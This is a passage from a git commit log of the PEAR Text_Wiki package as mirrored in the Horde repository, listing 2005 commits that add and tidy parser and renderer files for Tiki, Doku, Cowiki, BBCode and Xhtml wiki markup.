 Text/Wiki/Render/Tiki/Deflist.php       |  54 ++++++
 Text/Wiki/Render/Tiki/Delimiter.php     |  23 +++
 Text/Wiki/Render/Tiki/Embed.php         |  23 +++
 Text/Wiki/Render/Tiki/Emphasis.php      |  23 +++
 Text/Wiki/Render/Tiki/Freelink.php      |   9 +
 Text/Wiki/Render/Tiki/Function.php      |  70 +++++++
 Text/Wiki/Render/Tiki/Heading.php       |  11 ++
 Text/Wiki/Render/Tiki/Horiz.php         |  23 +++
 Text/Wiki/Render/Tiki/Html.php          |  23 +++
 Text/Wiki/Render/Tiki/Image.php         |  27 +++
 Text/Wiki/Render/Tiki/Include.php       |   8 +
 Text/Wiki/Render/Tiki/Interwiki.php     |  23 +++
 Text/Wiki/Render/Tiki/Italic.php        |  23 +++
 Text/Wiki/Render/Tiki/List.php          |  45 +++++
 Text/Wiki/Render/Tiki/Newline.php       |  13 ++
 Text/Wiki/Render/Tiki/Paragraph.php     |  23 +++
 Text/Wiki/Render/Tiki/Phplookup.php     |  25 +++
 Text/Wiki/Render/Tiki/Prefilter.php     |  40 ++++
 Text/Wiki/Render/Tiki/Raw.php           |  23 +++
 Text/Wiki/Render/Tiki/Revise.php        |  37 ++++
 Text/Wiki/Render/Tiki/Strong.php        |  23 +++
 Text/Wiki/Render/Tiki/Subscript.php     |  30 +++
 Text/Wiki/Render/Tiki/Superscript.php   |  30 +++
 Text/Wiki/Render/Tiki/Table.php         |  71 +++++++
 Text/Wiki/Render/Tiki/Tighten.php       |  10 +
 Text/Wiki/Render/Tiki/Toc.php           |  25 +++
 Text/Wiki/Render/Tiki/Tt.php            |  29 +++
 Text/Wiki/Render/Tiki/Underline.php     |  23 +++
 Text/Wiki/Render/Tiki/Url.php           |  24 +++
 Text/Wiki/Render/Tiki/Wikilink.php      |  29 +++
 Text/Wiki/Tiki.php                      |  78 ++++++++
 232 files changed, 16002 insertions(+)
 create mode 100644 Text/Wiki/Parse/Cowiki/Anchor.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Bold.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Break.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Center.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Code.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Colortext.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Deflist.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Embed.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Freelink.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Function.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Heading.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Horiz.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Html.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Image.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Include.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Interwiki.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Italic.php
 create mode 100644 Text/Wiki/Parse/Cowiki/List.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Newline.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Phplookup.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Raw.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Revise.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Strong.php
 create mode 100755 Text/Wiki/Parse/Cowiki/Subscript.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Superscript.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Table.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Tighten.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Toc.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Tt.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Underline.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Url.php
 create mode 100644 Text/Wiki/Parse/Cowiki/Wikilink.php
 create mode 100644 Text/Wiki/Parse/Doku/Anchor.php
 create mode 100644 Text/Wiki/Parse/Doku/Blockquote.php
 create mode 100644 Text/Wiki/Parse/Doku/Bold.php
 create mode 100644 Text/Wiki/Parse/Doku/Break.php
 create mode 100644 Text/Wiki/Parse/Doku/Center.php
 create mode 100644 Text/Wiki/Parse/Doku/Code.php
 create mode 100644 Text/Wiki/Parse/Doku/Colortext.php
 create mode 100644 Text/Wiki/Parse/Doku/Deflist.php
 create mode 100644 Text/Wiki/Parse/Doku/Delimiter.php
 create mode 100644 Text/Wiki/Parse/Doku/Embed.php
 create mode 100644 Text/Wiki/Parse/Doku/Emphasis.php
 create mode 100644 Text/Wiki/Parse/Doku/Freelink.php
 create mode 100644 Text/Wiki/Parse/Doku/Function.php
 create mode 100644 Text/Wiki/Parse/Doku/Heading.php
 create mode 100644 Text/Wiki/Parse/Doku/Horiz.php
 create mode 100644 Text/Wiki/Parse/Doku/Html.php
 create mode 100644 Text/Wiki/Parse/Doku/Image.php
 create mode 100644 Text/Wiki/Parse/Doku/Include.php
 create mode 100644 Text/Wiki/Parse/Doku/Interwiki.php
 create mode 100644 Text/Wiki/Parse/Doku/Italic.php
 create mode 100644 Text/Wiki/Parse/Doku/List.php
 create mode 100644 Text/Wiki/Parse/Doku/Newline.php
 create mode 100644 Text/Wiki/Parse/Doku/Paragraph.php
 create mode 100644 Text/Wiki/Parse/Doku/Phplookup.php
 create mode 100644 Text/Wiki/Parse/Doku/Prefilter.php
 create mode 100644 Text/Wiki/Parse/Doku/Raw.php
 create mode 100644 Text/Wiki/Parse/Doku/Revise.php
 create mode 100644 Text/Wiki/Parse/Doku/Strong.php
 create mode 100755 Text/Wiki/Parse/Doku/Subscript.php
 create mode 100644 Text/Wiki/Parse/Doku/Superscript.php
 create mode 100644 Text/Wiki/Parse/Doku/Table.php
 create mode 100644 Text/Wiki/Parse/Doku/Tighten.php
 create mode 100644 Text/Wiki/Parse/Doku/Toc.php
 create mode 100644 Text/Wiki/Parse/Doku/Tt.php
 create mode 100644 Text/Wiki/Parse/Doku/Underline.php
 create mode 100644 Text/Wiki/Parse/Doku/Url.php
 create mode 100644 Text/Wiki/Parse/Doku/Wikilink.php
 create mode 100755 Text/Wiki/Parse/Tiki/Anchor.php
 create mode 100755 Text/Wiki/Parse/Tiki/Blockquote.php
 create mode 100755 Text/Wiki/Parse/Tiki/Bold.php
 create mode 100755 Text/Wiki/Parse/Tiki/Box.php
 create mode 100755 Text/Wiki/Parse/Tiki/Break.php
 create mode 100755 Text/Wiki/Parse/Tiki/Center.php
 create mode 100755 Text/Wiki/Parse/Tiki/Code.php
 create mode 100755 Text/Wiki/Parse/Tiki/Colortext.php
 create mode 100755 Text/Wiki/Parse/Tiki/Deflist.php
 create mode 100755 Text/Wiki/Parse/Tiki/Delimiter.php
 create mode 100755 Text/Wiki/Parse/Tiki/Embed.php
 create mode 100755 Text/Wiki/Parse/Tiki/Emphasis.php
 create mode 100755 Text/Wiki/Parse/Tiki/Freelink.php
 create mode 100755 Text/Wiki/Parse/Tiki/Function.php
 create mode 100755 Text/Wiki/Parse/Tiki/Heading.php
 create mode 100755 Text/Wiki/Parse/Tiki/Horiz.php
 create mode 100755 Text/Wiki/Parse/Tiki/Html.php
 create mode 100755 Text/Wiki/Parse/Tiki/Image.php
 create mode 100755 Text/Wiki/Parse/Tiki/Include.php
 create mode 100755 Text/Wiki/Parse/Tiki/Interwiki.php
 create mode 100755 Text/Wiki/Parse/Tiki/Italic.php
 create mode 100755 Text/Wiki/Parse/Tiki/List.php
 create mode 100755 Text/Wiki/Parse/Tiki/Newline.php
 create mode 100644 Text/Wiki/Parse/Tiki/Page.php
 create mode 100755 Text/Wiki/Parse/Tiki/Paragraph.php
 create mode 100755 Text/Wiki/Parse/Tiki/Phplookup.php
 create mode 100644 Text/Wiki/Parse/Tiki/Plugin.php
 create mode 100755 Text/Wiki/Parse/Tiki/Prefilter.php
 create mode 100755 Text/Wiki/Parse/Tiki/Preformatted.php
 create mode 100755 Text/Wiki/Parse/Tiki/Raw.php
 create mode 100755 Text/Wiki/Parse/Tiki/Revise.php
 create mode 100644 Text/Wiki/Parse/Tiki/Specialchar.php
 create mode 100755 Text/Wiki/Parse/Tiki/Strong.php
 create mode 100755 Text/Wiki/Parse/Tiki/Subscript.php
 create mode 100755 Text/Wiki/Parse/Tiki/Superscript.php
 create mode 100755 Text/Wiki/Parse/Tiki/Table.php
 create mode 100755 Text/Wiki/Parse/Tiki/Tighten.php
 create mode 100644 Text/Wiki/Parse/Tiki/Titlebar.php
 create mode 100755 Text/Wiki/Parse/Tiki/Toc.php
 create mode 100755 Text/Wiki/Parse/Tiki/Tt.php
 create mode 100755 Text/Wiki/Parse/Tiki/Underline.php
 create mode 100755 Text/Wiki/Parse/Tiki/Url.php
 create mode 100755 Text/Wiki/Parse/Tiki/Wikilink.php
 create mode 100644 Text/Wiki/Render/Cowiki/Anchor.php
 create mode 100644 Text/Wiki/Render/Cowiki/Blockquote.php
 create mode 100644 Text/Wiki/Render/Cowiki/Bold.php
 create mode 100644 Text/Wiki/Render/Cowiki/Box.php
 create mode 100644 Text/Wiki/Render/Cowiki/Break.php
 create mode 100644 Text/Wiki/Render/Cowiki/Center.php
 create mode 100644 Text/Wiki/Render/Cowiki/Code.php
 create mode 100644 Text/Wiki/Render/Cowiki/Colortext.php
 create mode 100644 Text/Wiki/Render/Cowiki/Deflist.php
 create mode 100644 Text/Wiki/Render/Cowiki/Delimiter.php
 create mode 100644 Text/Wiki/Render/Cowiki/Embed.php
 create mode 100644 Text/Wiki/Render/Cowiki/Emphasis.php
 create mode 100644 Text/Wiki/Render/Cowiki/Freelink.php
 create mode 100644 Text/Wiki/Render/Cowiki/Function.php
 create mode 100644 Text/Wiki/Render/Cowiki/Heading.php
 create mode 100644 Text/Wiki/Render/Cowiki/Horiz.php
 create mode 100644 Text/Wiki/Render/Cowiki/Html.php
 create mode 100644 Text/Wiki/Render/Cowiki/Image.php
 create mode 100644 Text/Wiki/Render/Cowiki/Include.php
 create mode 100644 Text/Wiki/Render/Cowiki/Interwiki.php
 create mode 100644 Text/Wiki/Render/Cowiki/Italic.php
 create mode 100644 Text/Wiki/Render/Cowiki/List.php
 create mode 100644 Text/Wiki/Render/Cowiki/Newline.php
 create mode 100644 Text/Wiki/Render/Cowiki/Paragraph.php
 create mode 100644 Text/Wiki/Render/Cowiki/Phplookup.php
 create mode 100644 Text/Wiki/Render/Cowiki/Prefilter.php
 create mode 100644 Text/Wiki/Render/Cowiki/Raw.php
 create mode 100644 Text/Wiki/Render/Cowiki/Revise.php
 create mode 100644 Text/Wiki/Render/Cowiki/Strong.php
 create mode 100755 Text/Wiki/Render/Cowiki/Subscript.php
 create mode 100644 Text/Wiki/Render/Cowiki/Superscript.php
 create mode 100644 Text/Wiki/Render/Cowiki/Table.php
 create mode 100644 Text/Wiki/Render/Cowiki/Tighten.php
 create mode 100644 Text/Wiki/Render/Cowiki/Toc.php
 create mode 100644 Text/Wiki/Render/Cowiki/Tt.php
 create mode 100644 Text/Wiki/Render/Cowiki/Underline.php
 create mode 100644 Text/Wiki/Render/Cowiki/Url.php
 create mode 100644 Text/Wiki/Render/Cowiki/Wikilink.php
 create mode 100644 Text/Wiki/Render/Doku/Anchor.php
 create mode 100644 Text/Wiki/Render/Doku/Blockquote.php
 create mode 100644 Text/Wiki/Render/Doku/Bold.php
 create mode 100644 Text/Wiki/Render/Doku/Box.php
 create mode 100644 Text/Wiki/Render/Doku/Break.php
 create mode 100644 Text/Wiki/Render/Doku/Center.php
 create mode 100644 Text/Wiki/Render/Doku/Code.php
 create mode 100644 Text/Wiki/Render/Doku/Colortext.php
 create mode 100644 Text/Wiki/Render/Doku/Deflist.php
 create mode 100644 Text/Wiki/Render/Doku/Delimiter.php
 create mode 100644 Text/Wiki/Render/Doku/Embed.php
 create mode 100644 Text/Wiki/Render/Doku/Emphasis.php
 create mode 100644 Text/Wiki/Render/Doku/Freelink.php
 create mode 100644 Text/Wiki/Render/Doku/Function.php
 create mode 100644 Text/Wiki/Render/Doku/Heading.php
 create mode 100644 Text/Wiki/Render/Doku/Horiz.php
 create mode 100644 Text/Wiki/Render/Doku/Html.php
 create mode 100644 Text/Wiki/Render/Doku/Image.php
 create mode 100644 Text/Wiki/Render/Doku/Include.php
 create mode 100644 Text/Wiki/Render/Doku/Interwiki.php
 create mode 100644 Text/Wiki/Render/Doku/Italic.php
 create mode 100644 Text/Wiki/Render/Doku/List.php
 create mode 100644 Text/Wiki/Render/Doku/Newline.php
 create mode 100644 Text/Wiki/Render/Doku/Paragraph.php
 create mode 100644 Text/Wiki/Render/Doku/Phplookup.php
 create mode 100644 Text/Wiki/Render/Doku/Prefilter.php
 create mode 100644 Text/Wiki/Render/Doku/Raw.php
 create mode 100644 Text/Wiki/Render/Doku/Revise.php
 create mode 100644 Text/Wiki/Render/Doku/Strong.php
 create mode 100755 Text/Wiki/Render/Doku/Subscript.php
 create mode 100644 Text/Wiki/Render/Doku/Superscript.php
 create mode 100644 Text/Wiki/Render/Doku/Table.php
 create mode 100644 Text/Wiki/Render/Doku/Tighten.php
 create mode 100644 Text/Wiki/Render/Doku/Toc.php
 create mode 100644 Text/Wiki/Render/Doku/Tt.php
 create mode 100644 Text/Wiki/Render/Doku/Underline.php
 create mode 100644 Text/Wiki/Render/Doku/Url.php
 create mode 100644 Text/Wiki/Render/Doku/Wikilink.php
 create mode 100644 Text/Wiki/Render/Tiki/Anchor.php
 create mode 100644 Text/Wiki/Render/Tiki/Blockquote.php
 create mode 100644 Text/Wiki/Render/Tiki/Bold.php
 create mode 100644 Text/Wiki/Render/Tiki/Box.php
 create mode 100644 Text/Wiki/Render/Tiki/Break.php
 create mode 100644 Text/Wiki/Render/Tiki/Center.php
 create mode 100644 Text/Wiki/Render/Tiki/Code.php
 create mode 100644 Text/Wiki/Render/Tiki/Colortext.php
 create mode 100644 Text/Wiki/Render/Tiki/Deflist.php
 create mode 100644 Text/Wiki/Render/Tiki/Delimiter.php
 create mode 100644 Text/Wiki/Render/Tiki/Embed.php
 create mode 100644 Text/Wiki/Render/Tiki/Emphasis.php
 create mode 100644 Text/Wiki/Render/Tiki/Freelink.php
 create mode 100644 Text/Wiki/Render/Tiki/Function.php
 create mode 100755 Text/Wiki/Render/Tiki/Heading.php
 create mode 100644 Text/Wiki/Render/Tiki/Horiz.php
 create mode 100644 Text/Wiki/Render/Tiki/Html.php
 create mode 100644 Text/Wiki/Render/Tiki/Image.php
 create mode 100644 Text/Wiki/Render/Tiki/Include.php
 create mode 100644 Text/Wiki/Render/Tiki/Interwiki.php
 create mode 100644 Text/Wiki/Render/Tiki/Italic.php
 create mode 100644 Text/Wiki/Render/Tiki/List.php
 create mode 100644 Text/Wiki/Render/Tiki/Newline.php
 create mode 100644 Text/Wiki/Render/Tiki/Paragraph.php
 create mode 100644 Text/Wiki/Render/Tiki/Phplookup.php
 create mode 100644 Text/Wiki/Render/Tiki/Prefilter.php
 create mode 100644 Text/Wiki/Render/Tiki/Raw.php
 create mode 100644 Text/Wiki/Render/Tiki/Revise.php
 create mode 100644 Text/Wiki/Render/Tiki/Strong.php
 create mode 100755 Text/Wiki/Render/Tiki/Subscript.php
 create mode 100644 Text/Wiki/Render/Tiki/Superscript.php
 create mode 100644 Text/Wiki/Render/Tiki/Table.php
 create mode 100644 Text/Wiki/Render/Tiki/Tighten.php
 create mode 100644 Text/Wiki/Render/Tiki/Toc.php
 create mode 100644 Text/Wiki/Render/Tiki/Tt.php
 create mode 100644 Text/Wiki/Render/Tiki/Underline.php
 create mode 100644 Text/Wiki/Render/Tiki/Url.php
 create mode 100644 Text/Wiki/Render/Tiki/Wikilink.php
 create mode 100644 Text/Wiki/Tiki.php

http://github.com/horde/horde/commit/2556a3aeba8ad6195459a3f9d7fcbe69cb97d7c9

-----------------------------------------------------------------------

commit 2f3b2c8d55beab7519beebd09aeaa879a3ef6312
Author: bertrand Gugger 
Date:   Fri Jul 22 09:02:09 2005 +0000

    List rule with double staged recursive preg_replace_callback()
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191195 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/List.php | 182 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 182 insertions(+)
 create mode 100644 Text/Wiki/BBCode/Parse/List.php

http://github.com/horde/horde/commit/2f3b2c8d55beab7519beebd09aeaa879a3ef6312

-----------------------------------------------------------------------

commit 2873d7e3faa99e1c5649e4bac2c4204193737c1e
Author: Justin Patrin 
Date:   Sat Jul 23 20:25:31 2005 +0000

    Checking in missing Render classes (I thought I'd added these before..)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191293 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Cowiki.php | 16 ++++++++++++++++
 Text/Wiki/Render/Doku.php   | 16 ++++++++++++++++
 Text/Wiki/Render/Tiki.php   | 16 ++++++++++++++++
 3 files changed, 48 insertions(+)
 create mode 100644 Text/Wiki/Render/Cowiki.php
 create mode 100644 Text/Wiki/Render/Doku.php
 create mode 100644 Text/Wiki/Render/Tiki.php

http://github.com/horde/horde/commit/2873d7e3faa99e1c5649e4bac2c4204193737c1e

-----------------------------------------------------------------------

commit 74e4ec90711e062f66110cb3535352f8786d502a
Author: bertrand Gugger 
Date:   Sun Jul 24 10:31:13 2005 +0000

    Don't catch the '=' if optional numbering
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191343 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/List.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/74e4ec90711e062f66110cb3535352f8786d502a

-----------------------------------------------------------------------

commit 9314fd0bd70011962ec615a53ce95004881d2836
Author: bertrand Gugger 
Date:   Wed Jul 27 12:26:24 2005 +0000

    Wikiplugins starts anywhere, not necessarly on begin of line, simplified the regexp
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191632 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Tiki/Plugin.php | 36 ++++++++++++++++++------------------
 1 file changed, 18 insertions(+), 18 deletions(-)

http://github.com/horde/horde/commit/9314fd0bd70011962ec615a53ce95004881d2836

-----------------------------------------------------------------------

commit cc02bdb354b27ebbea58ba2e4ca08325dac21b37
Author: bertrand Gugger 
Date:   Thu Jul 28 10:59:23 2005 +0000

    A true test === for translate format conf is enough and works now !
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191693 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml.php | 34 +++++++++++++++++-----------------
 1 file changed, 17 insertions(+), 17 deletions(-)

http://github.com/horde/horde/commit/cc02bdb354b27ebbea58ba2e4ca08325dac21b37

-----------------------------------------------------------------------

commit 5c33524e5e8081a2078854a0cc0e01b5759ab2dc
Author: bertrand Gugger 
Date:   Thu Jul 28 11:23:38 2005 +0000

    Plugins produce wiki markup so are processed by parsing, no tokens produced
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191701 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Plugin.php | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 Text/Wiki/Render/Xhtml/Plugin.php

http://github.com/horde/horde/commit/5c33524e5e8081a2078854a0cc0e01b5759ab2dc

-----------------------------------------------------------------------

commit 0a272249b5d0dc8459047d5f8449b3c20b0c32d3
Author: bertrand Gugger 
Date:   Thu Jul 28 11:28:02 2005 +0000

    The rule take care of nested plugins, the plugin processing is done by parsing as
    plugins produce wiki markup, this production is also recursively parsed case plugins produced
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191704 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Tiki/Plugin.php | 75 +++++++++++++++++++++++++++--------------
 1 file changed, 50 insertions(+), 25 deletions(-)

http://github.com/horde/horde/commit/0a272249b5d0dc8459047d5f8449b3c20b0c32d3

-----------------------------------------------------------------------

commit b84807a67f567fe5927a666a81b16338d27aa398
Author: bertrand Gugger 
Date:   Fri Jul 29 08:29:20 2005 +0000

    Cleaning headers before to bundle in tikiwiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191780 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php | 862 +++++++++++++++++++++++++++++-----------------------------
 1 file changed, 425 insertions(+), 437 deletions(-)

http://github.com/horde/horde/commit/b84807a67f567fe5927a666a81b16338d27aa398

-----------------------------------------------------------------------

commit 53ee8fe68888d07cb17763431a061b326c2ae3d0
Author: bertrand Gugger 
Date:   Fri Jul 29 08:57:29 2005 +0000

    headers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191781 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse.php  | 235 +++++++++++++++++++++++++--------------------------
 Text/Wiki/Render.php | 175 ++++++++++++++++++--------------------
 2 files changed, 200 insertions(+), 210 deletions(-)

http://github.com/horde/horde/commit/53ee8fe68888d07cb17763431a061b326c2ae3d0

-----------------------------------------------------------------------

commit fa641b7446cbcc937577c96bb6ceb3354e6846ed
Author: bertrand Gugger 
Date:   Fri Jul 29 09:17:51 2005 +0000

    headers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191783 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Tiki.php | 34 +++++++++++++++++++++++++++++++++-
 1 file changed, 33 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/fa641b7446cbcc937577c96bb6ceb3354e6846ed

-----------------------------------------------------------------------

commit ea2f9dd5e6b29c7f2d9e834fd528d0489c46156d
Author: bertrand Gugger 
Date:   Fri Jul 29 10:15:05 2005 +0000

    headers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191788 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml.php | 23 +++++++++++++++++++++++
 1 file changed, 23 insertions(+)

http://github.com/horde/horde/commit/ea2f9dd5e6b29c7f2d9e834fd528d0489c46156d

-----------------------------------------------------------------------

commit 3b933137f31655b0435088dfd712f72a39dd83fc
Author: bertrand Gugger 
Date:   Fri Jul 29 12:36:11 2005 +0000

    Fixing back justin's commit by synch with tiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191791 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Anchor.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/3b933137f31655b0435088dfd712f72a39dd83fc

-----------------------------------------------------------------------

commit 6895442e6edb554d0194c089c7acbc81c42a1b9b
Author: bertrand Gugger 
Date:   Fri Jul 29 12:38:34 2005 +0000

    A new rule introduced by tiki for drawing boxes
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191792 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Box.php | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 Text/Wiki/Render/Xhtml/Box.php

http://github.com/horde/horde/commit/6895442e6edb554d0194c089c7acbc81c42a1b9b

-----------------------------------------------------------------------

commit 9b38e7dd3f495b5e69e2792925883a1f7b7d04d1
Author: bertrand Gugger 
Date:   Fri Jul 29 13:19:31 2005 +0000

    Synching back justin's commits from tikiwiki, that's all what is ok,
    the rest is buggy and introduces extra dependencies (in tikiwiki copy)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191797 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Code.php | 51 +++++++++++++++++++++--------------------
 1 file changed, 26 insertions(+), 25 deletions(-)

http://github.com/horde/horde/commit/9b38e7dd3f495b5e69e2792925883a1f7b7d04d1

-----------------------------------------------------------------------

commit 563242d9d8e52372ad12bd108f2e080e4e572e40
Author: bertrand Gugger 
Date:   Fri Jul 29 13:29:56 2005 +0000

    Synch back justin's commit in tikiwiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191799 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Colortext.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/563242d9d8e52372ad12bd108f2e080e4e572e40

-----------------------------------------------------------------------

commit f393df588a79eb66c66a429b2bfdbad362ad6f92
Author: bertrand Gugger 
Date:   Fri Jul 29 13:45:46 2005 +0000

    Introduces tikiwiki/justin's collapsing in headers, needs some refactoting though
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191801 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Heading.php | 55 +++++++++++++++++++++++++++++++-------
 1 file changed, 45 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/f393df588a79eb66c66a429b2bfdbad362ad6f92

-----------------------------------------------------------------------

commit 50e0d22199aa5aa141c6aead38a636c4cb281398
Author: bertrand Gugger 
Date:   Fri Jul 29 13:56:30 2005 +0000

    4 new rules introduced for tiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191802 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Page.php         | 23 ++++++++++++++++++++++
 Text/Wiki/Render/Xhtml/Preformatted.php | 23 ++++++++++++++++++++++
 Text/Wiki/Render/Xhtml/Specialchar.php  | 29 ++++++++++++++++++++++++++++
 Text/Wiki/Render/Xhtml/Titlebar.php     | 34 +++++++++++++++++++++++++++++++++
 4 files changed, 109 insertions(+)
 create mode 100644 Text/Wiki/Render/Xhtml/Page.php
 create mode 100644 Text/Wiki/Render/Xhtml/Preformatted.php
 create mode 100644 Text/Wiki/Render/Xhtml/Specialchar.php
 create mode 100644 Text/Wiki/Render/Xhtml/Titlebar.php

http://github.com/horde/horde/commit/50e0d22199aa5aa141c6aead38a636c4cb281398

-----------------------------------------------------------------------

commit afcc98eb84392b74d95fb69834a3bd09aca86ecb
Author: bertrand Gugger 
Date:   Sat Jul 30 08:03:29 2005 +0000

    Headers ... ouf !
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191862 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Anchor.php       | 43 +++++++++------
 Text/Wiki/Render/Xhtml/Blockquote.php   | 49 +++++++++++++-----
 Text/Wiki/Render/Xhtml/Bold.php         | 41 +++++++++++----
 Text/Wiki/Render/Xhtml/Box.php          | 41 +++++++++++----
 Text/Wiki/Render/Xhtml/Break.php        | 37 ++++++++++---
 Text/Wiki/Render/Xhtml/Center.php       | 39 +++++++++++---
 Text/Wiki/Render/Xhtml/Code.php         | 25 ++++++++-
 Text/Wiki/Render/Xhtml/Colortext.php    | 47 ++++++++++++-----
 Text/Wiki/Render/Xhtml/Deflist.php      | 59 ++++++++++++++-------
 Text/Wiki/Render/Xhtml/Delimiter.php    | 39 +++++++++++---
 Text/Wiki/Render/Xhtml/Embed.php        | 39 +++++++++++---
 Text/Wiki/Render/Xhtml/Emphasis.php     | 45 ++++++++++++----
 Text/Wiki/Render/Xhtml/Freelink.php     | 28 +++++++++-
 Text/Wiki/Render/Xhtml/Function.php     | 67 +++++++++++++++---------
 Text/Wiki/Render/Xhtml/Heading.php      | 23 +++++++++
 Text/Wiki/Render/Xhtml/Horiz.php        | 41 +++++++++++----
 Text/Wiki/Render/Xhtml/Html.php         | 41 +++++++++++----
 Text/Wiki/Render/Xhtml/Image.php        | 90 ++++++++++++++++++++------------
 Text/Wiki/Render/Xhtml/Include.php      | 28 +++++++++-
 Text/Wiki/Render/Xhtml/Interwiki.php    | 57 ++++++++++++++------
 Text/Wiki/Render/Xhtml/Italic.php       | 43 +++++++++++----
 Text/Wiki/Render/Xhtml/List.php         | 92 ++++++++++++++++++++-------------
 Text/Wiki/Render/Xhtml/Newline.php      | 29 +++++++++--
 Text/Wiki/Render/Xhtml/Page.php         | 39 +++++++++++---
 Text/Wiki/Render/Xhtml/Paragraph.php    | 45 ++++++++++++----
 Text/Wiki/Render/Xhtml/Phplookup.php    | 55 ++++++++++++++------
 Text/Wiki/Render/Xhtml/Plugin.php       | 24 +++++++++
 Text/Wiki/Render/Xhtml/Prefilter.php    | 56 +++++++++-----------
 Text/Wiki/Render/Xhtml/Preformatted.php | 39 +++++++++++---
 Text/Wiki/Render/Xhtml/Raw.php          | 39 +++++++++++---
 Text/Wiki/Render/Xhtml/Revise.php       | 49 +++++++++++++-----
 Text/Wiki/Render/Xhtml/Specialchar.php  | 27 +++++++++-
 Text/Wiki/Render/Xhtml/Strong.php       | 45 ++++++++++++----
 Text/Wiki/Render/Xhtml/Subscript.php    | 43 +++++++++++----
 Text/Wiki/Render/Xhtml/Superscript.php  | 43 +++++++++++----
 Text/Wiki/Render/Xhtml/Table.php        | 73 +++++++++++++++++---------
 Text/Wiki/Render/Xhtml/Tighten.php      | 30 +++++++++--
